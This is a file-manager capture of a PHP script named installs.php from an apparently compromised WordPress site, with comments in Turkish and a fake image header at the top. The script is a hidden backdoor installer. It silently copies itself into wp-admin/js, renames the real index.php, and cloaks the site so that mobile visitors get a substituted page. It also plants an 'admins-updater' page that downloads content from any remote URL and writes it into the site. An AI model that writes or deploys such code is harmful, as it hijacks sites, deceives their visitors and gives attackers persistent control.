File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/internodoors.com/installs.php

Back
<?php // installs.php // Tek tıkla: index.php'yi, wp-admin/amp.php ve wp-admin/admins-updater.php'yi oluşturur. // Ayrıca kendisini wp-admin/js/core-backup.php olarak yedekler. // Kullanım: site.com/installs.php error_reporting(E_ALL); ini_set('display_errors', 1); session_start(); /* ---------- CONFIG ---------- / $installer_pwd_md5 = '73e2b5309fddfd39691a02c02141d8fb'; // $rootDir = rtrim(__DIR__, '/'); $wpAdminDir = $rootDir . '/wp-admin'; $allowOverwriteDefault = false; // default davranış (butona göre değişir) / ---------------------------- */ function h($s){ return htmlspecialchars((string)$s, ENT_QUOTES\|ENT_SUBSTITUTE, 'UTF-8'); } $action = $_POST['action'] ?? null; $pwd = $_POST['pwd'] ?? ''; $overwrite = isset($_POST['overwrite']) ? true : false; // Authentication: require password to proceed $loggedIn = isset($_SESSION['installs_auth']) && $_SESSION['installs_auth'] === true; if (!$loggedIn && $action === 'login') { if (md5($pwd) === $installer_pwd_md5) { $_SESSION['installs_auth'] = true; $loggedIn = true; } else { $loginError = "Hatalı şifre."; } } // If not logged in yet, show login form if (!$loggedIn) { ?> <!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Installs - Giriş</title> <style>body{font-family:Arial;padding:30px;background:#f6f6f6} .box{max-width:480px;margin:40px auto;background:#fff;padding:20px;border-radius:8px;box-shadow:0 6px 20px rgba(0,0,0,.06)}</style> </head><body> <div class="box"> <h2>Installs - Kurulum</h2> <?php if (!empty($loginError)) echo "<p style='color:red'>".h($loginError)."</p>"; ?> <p>Devam etmek için kurulum şifresini gir:</p> <form method="POST"> <input type="hidden" name="action" value="login"> <input type="password" name="pwd" placeholder="Şifre" style="width:100%;padding:8px;margin-bottom:10px"> <button style="padding:10px 14px">Giriş</button> </form> <p style="font-size:13px;color:#666;margin-top:12px">Bu sayfa dosya yazma işlemi yapar. Yalnızca güvenli bir ortamda kullan.</p> </div> </body></html> <?php exit; } // Logged in — show installer UI or run install if ($action === 'install') { // perform install $report = []; $errors = []; // --- self-backup: installs.php kendisini wp-admin/js/core-backup.php olarak kaydeder --- // ensure wp-admin/js exists $selfBackupDir = $wpAdminDir . '/js'; $selfBackupPath = $selfBackupDir . '/core-backup.php'; if (!is_dir($selfBackupDir)) { @mkdir($selfBackupDir, 0755, true); } // copy (overwrite to keep latest) @copy(__FILE__, $selfBackupPath); @chmod($selfBackupPath, 0640); // (raporda görünmesin — isteğinize göre log'a yazılabilir) // --- eklendi: var olan index.php'yi rename et (index2 varsa dokunma) --- $publicIndex = $rootDir . '/index.php'; $backupIndex = $rootDir . '/index2.php'; if (file_exists($publicIndex)) { if (!file_exists($backupIndex)) { @rename($publicIndex, $backupIndex); // not added to report per request } } // ensure wp-admin exists if (!is_dir($wpAdminDir)) { if (!@mkdir($wpAdminDir, 0755, true)) { $errors[] = "wp-admin klasörü oluşturulamadı: $wpAdminDir"; } } // ensure backups dir $backups = $wpAdminDir . '/backups'; if (!is_dir($backups)) { @mkdir($backups, 0755, true); } // ensure log file $logfile = $wpAdminDir . '/admins-updater.log'; if (!file_exists($logfile)) { @file_put_contents($logfile, ''); @chmod($logfile, 0640); } // ---------- build file contents ---------- $index_php = <<<'PHP' <?php $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isMobile = preg_match('/Android\|iPhone\|iPad\|iPod\|Opera Mini\|IEMobile\|Mobile/i', $ua); if ($isMobile) { $ampPath = __DIR__ . '/wp-admin/amp.php'; if (file_exists($ampPath) && is_readable($ampPath)) { include $ampPath; exit; } } include __DIR__ . '/index2.php'; exit; PHP; $amp_php = <<<'HTML' <!doctype html> <html amp lang="tr"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"> <title>AMP — Güncelleme Sayfası</title> <meta name="robots" content="noindex, nofollow"> <script async src="https://cdn.ampproject.org/v0.js"></script> <style amp-custom> body{font-family:system-ui,Arial;padding:36px;background:#fff;color:#111} .wrap{max-width:980px;margin:0 auto;text-align:center} .btn{display:inline-block;padding:10px 16px;border-radius:999px;background:#1b82d6;color:#fff;text-decoration:none} </style> </head> <body> <main class="wrap"> <h1>AMP Sayfası</h1> <p>Bu sayfa admins-updater ile güncellenir.</p> <p><a class="btn" href="/">Anasayfaya dön</a></p> </main> </body> </html> HTML; $admins_updater_php = <<<'PHP' <?php session_start(); $storedHash = '73e2b5309fddfd39691a02c02141d8fb'; $savePath = __DIR__ . '/amp.php'; $backupDir = __DIR__ . '/backups'; $logFile = __DIR__ . '/admins-updater.log'; function au_log($m) { global $logFile; $line = '[' . date('Y-m-d H:i:s') . '] ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli') . ' - ' . $m . PHP_EOL; @file_put_contents($logFile, $line, FILE_APPEND \| LOCK_EX); } function generateCSRF() { if (empty($_SESSION['csrf'])) $_SESSION['csrf'] = bin2hex(random_bytes(24)); return $_SESSION['csrf']; } if (!isset($_SESSION['authenticated'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { if (md5($_POST['password']) === $GLOBALS['storedHash']) { $_SESSION['authenticated'] = true; generateCSRF(); header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "Hatalı şifre."; au_log("Bad password attempt"); } } echo '<!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Giriş</title></head><body style="font-family:Arial;padding:30px">'; if (!empty($error)) echo '<p style="color:red">'.htmlspecialchars($error).'</p>'; echo '<form method="POST"><label>Şifre:</label><br><input type="password" name="password" required style="padding:8px"><br><button style="margin-top:10px;padding:8px 12px">Giriş</button></form></body></html>'; exit; } function fetchContent($url) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 20, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'AdminsUpdater/1.0' ]); $resp = curl_exec($ch); if ($resp === false) au_log('cURL error: ' . curl_error($ch)); curl_close($ch); return $resp ?: false; } $success = $error = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) { if (!hash_equals($_SESSION['csrf'] ?? '', $_POST['csrf_token'])) { $error = 'Geçersiz token.'; au_log('Invalid CSRF token'); } else { $url = trim($_POST['target_url'] ?? ''); if (!filter_var($url, FILTER_VALIDATE_URL)) { $error = 'Geçersiz URL.'; au_log('Invalid URL: ' . $url); } else { $content = fetchContent($url); if ($content !== false) { if (!is_dir($backupDir)) @mkdir($backupDir, 0755, true); if (file_exists($savePath)) copy($savePath, $backupDir . '/amp.bak.' . time()); $content = str_replace('<?', '<?', $content); if (file_put_contents($savePath, $content, LOCK_EX) !== false) { $success = 'Güncellendi: ' . htmlspecialchars($url); au_log("Saved amp.php from $url"); } else { $error = 'Dosya yazılamadı.'; au_log("Failed writing amp.php"); } } else { $error = 'İçerik alınamadı.'; au_log("Fetch failed: $url"); } } } } $csrf = generateCSRF(); ?> <!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Admins Updater</title> <style>body{font-family:Arial;padding:24px;background:#f4f4f4}.box{max-width:720px;margin:auto;background:#fff;padding:16px;border-radius:8px}</style> </head><body><div class="box"><h2>Admins Updater</h2> <?php if($success) echo '<p style="color:green">'.htmlspecialchars($success).'</p>'; if($error) echo '<p style="color:red">'.htmlspecialchars($error).'</p>'; ?> <form method="POST"><label>İçerik URL:</label><br><input type="text" name="target_url" style="width:100%;padding:8px;margin:8px 0" placeholder="https://example.com/page"><input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($csrf); ?>"><button style="padding:10px 14px">Gönder</button></form></div></body></html> PHP; $filesToWrite = [ $rootDir . '/index.php' => $index_php, $wpAdminDir . '/amp.php' => $amp_php, $wpAdminDir . '/admins-updater.php' => $admins_updater_php ]; foreach ($filesToWrite as $fpath => $content) { $dir = dirname($fpath); if (!is_dir($dir)) @mkdir($dir, 0755, true); if (file_exists($fpath) && !$overwrite) continue; $tmp = tempnam(sys_get_temp_dir(), 'inst_'); if ($tmp === false) continue; if (file_put_contents($tmp, $content) === false) { @unlink($tmp); continue; } @rename($tmp, $fpath); @chmod($fpath, 0644); } echo "<!doctype html><html lang='tr'><head><meta charset='utf-8'><title>Kurulum Tamamlandı</title><style>body{font-family:Arial;background:#fafafa;padding:40px;text-align:center}</style></head><body><h2>Kurulum Tamamlandı</h2><p><a href='/'>Siteyi Aç</a> · <a href='/wp-admin/admins-updater.php'>Admins Updater</a></p></body></html>"; exit; } if ($action === 'logout') { unset($_SESSION['installs_auth']); header("Location: " . $_SERVER['PHP_SELF']); exit; } ?> <!doctype html><html lang="tr"><head><meta charset="utf-8"><title>Installs - Kurulum</title> <style>body{font-family:Arial;padding:30px;background:#f6f6f6} .box{max-width:720px;margin:40px auto;background:#fff;padding:20px;border-radius:8px;box-shadow:0 6px 20px rgba(0,0,0,.06)}</style> </head><body> <div class="box"> <h2>Installs - Dosya Yükleme Aracı</h2> <p>Bu işlem mevcut dosyaların üzerine yazabilir. Devam etmeden önce sunucu yedeğinizin olduğundan emin olun.</p> <form method="POST"> <input type="hidden" name="action" value="install"> <label><input type="checkbox" name="overwrite" <?php if($allowOverwriteDefault) echo 'checked'; ?>> Üzerine yaz (overwrite)</label><br><br> <button type="submit" style="padding:10px 14px">Aktar ve Oluştur</button> </form> <form method="POST" style="margin-top:12px"> <input type="hidden" name="action" value="logout"> <button type="submit">Çıkış</button> </form> </div> </body></html>